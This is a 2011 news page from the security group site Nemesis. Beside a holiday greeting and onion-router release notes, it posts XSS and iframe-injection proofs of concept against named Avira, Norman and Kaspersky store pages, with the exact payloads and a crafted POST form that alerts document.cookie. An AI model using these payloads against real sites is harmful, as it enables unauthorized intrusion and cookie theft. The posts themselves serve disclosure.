Nemesis Our projects Forums Extra Controls
Stats
   Active visitors: 1

News


Merry Christmas!

May the good times and treasures of the present become the golden memories of tomorrow. Wish you lots of love, joy and happiness. MERRY CHRISTMAS to everyone.

']['€AM€LiT€

Submitted on 2011-12-24 by Neo (0 comments)

Advanced Onion Router 0.3.0.7

New release of Advanced Onion Router - version 0.3.0.7.

Changes:
  • corrected a change from version 0.3.0.6 in tor_addr_port_parse() that caused it to return errors when parsing proxy IP addresses (thanks to anonymous11 for reporting this error)
  • improved the search algorithm for addresses that are added to the context menus related to strings selected in the "Debug" window
  • all router selection dialogs will show bandwidth capacities instead of bandwidth rates for routers that are not banned
  • the lists with favorite routers and with banned routers are no longer limited to 65536 characters
  • added instructions for using TorChat with AdvOR and configuration samples to AdvOR\Help\TorChat (readme.txt, AdvOR.ini and torrc.txt)


Download:


Submitted on 2011-12-20 by Vektor (0 comments)

Avira.com - XSS

Vulnerable page: http://www.avira.com/en/support-phonesupport-for-business

In order to reproduce the bug, you need to include any HTML code in all required fields. The code I've used:

Code:
"><h1>XSS by TE</h1>


Screenshot:

http://img18.imageshack.us/img18/6125/beztytuuxjj.png

Note: This is a proof of concept and it doesn't reflect the views or interests of above website. The administration of above website have been informed about the flaw.

Submitted on 2011-12-20 by Neo (0 comments)

Another Norman.com XSS Vulnerability

Vulnerable page: http://www.norman.com/support/

PoC:

Code:
<form method="post" action="http://www.norman.com/support/lost_authentication_key">
<input type="hidden" name="lime_uniqueIdentifier" value="1" />
<input type="hidden" name="email" value=""><img src=http://nemesis.te-home.net/img/logo.jpg />" />
<input type="submit" value="XSS" />
</form>

<form method="post" action="http://www.norman.com/support/lost_authentication_key">
<input type="hidden" name="lime_uniqueIdentifier" value="1" />
<input type="hidden" name="email" value=""><script>alert(document.cookie)</script>" />
<input type="submit" value="XSS" />
</form>

To reproduce the bug you need a HTML form that uses POST method, set lime_uniqueIdentifier input tag value to 1 and use email as XSS code input field. Click on example button:


http://img834.imageshack.us/img834/9605/norm1.png

http://img703.imageshack.us/img703/7928/norm2.png

Related stuff: Norman.com XSS Vulnerability

Notes:

This is a proof of concept and it doesn't reflect the views or interests of above website.
The owner of above website has been notified.

Submitted on 2011-12-19 by RoLex (0 comments)

Kaspersky (Polish website) - XSS & Iframe Injection

Vulnerable page: https://www.softbuy.pl/kaspersky/store

In order to reproduce the bug you need to include any HTML code in all required fields. The code I used:

Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


and

Code:
"><iframe src=http://nemesis.te-home.net></iframe>


Screenshots:

XSS -

http://img535.imageshack.us/img535/5586/xsskaspersky.png

Iframe Injection -

http://img191.imageshack.us/img191/2293/kasperskyiframe.png

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.

Submitted on 2011-12-18 by Neo (0 comments)



Older